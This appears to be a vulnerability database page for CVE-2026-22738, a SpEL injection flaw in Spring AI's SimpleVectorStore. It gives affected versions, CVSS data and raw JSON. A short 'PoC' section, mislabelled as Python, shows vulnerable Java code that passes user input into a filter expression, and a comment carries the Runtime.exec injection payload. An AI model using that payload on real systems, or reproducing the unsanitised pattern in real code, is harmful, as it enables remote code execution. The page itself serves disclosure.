Security Vulnerability Report
中文
CVE-2026-22738 CVSS 9.8 CRITICAL

CVE-2026-22738

Published: 2026-03-27 06:16:38
Last Modified: 2026-05-10 14:16:48
Source: [email protected]

Description

In Spring AI, a SpEL injection vulnerability exists in SimpleVectorStore when a user-supplied value is used as a filter expression key. A malicious actor could exploit this to execute arbitrary code. Only applications that use SimpleVectorStore and pass user-supplied input as a filter expression key are affected. This issue affects Spring AI: from 1.0.0 before 1.0.5, from 1.1.0 before 1.1.4.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE
Spring AI >= 1.0.0, < 1.0.5
Spring AI >= 1.1.0, < 1.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Vulnerable Code Example in Java import org.springframework.ai.vectorstore.SimpleVectorStore; import org.springframework.ai.vectorstore.SearchRequest; public class VulnerableService { private SimpleVectorStore vectorStore; public void search(String userInput) { // Vulnerability: userInput is directly used as a filter expression key // Attacker input: "T(java.lang.Runtime).getRuntime().exec('calc')" SearchRequest request = SearchRequest.query("test").withFilterExpression(userInput); vectorStore.similaritySearch(request); } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22738", "sourceIdentifier": "[email protected]", "published": "2026-03-27T06:16:37.663", "lastModified": "2026-05-10T14:16:48.133", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Spring AI, a SpEL injection vulnerability exists in SimpleVectorStore when a user-supplied value is used as a filter expression key. A malicious actor could exploit this to execute arbitrary code. Only applications that use SimpleVectorStore and pass user-supplied input as a filter expression key are affected.\nThis issue affects Spring AI: from 1.0.0 before 1.0.5, from 1.1.0 before 1.1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-917"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.5", "matchCriteriaId": "28BAEC64-E23B-478B-B206-5580BB00516F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "1.1.4", "matchCriteriaId": "E3774C35-AE82-486B-8E13-8FCC34D3CA30"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22738", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.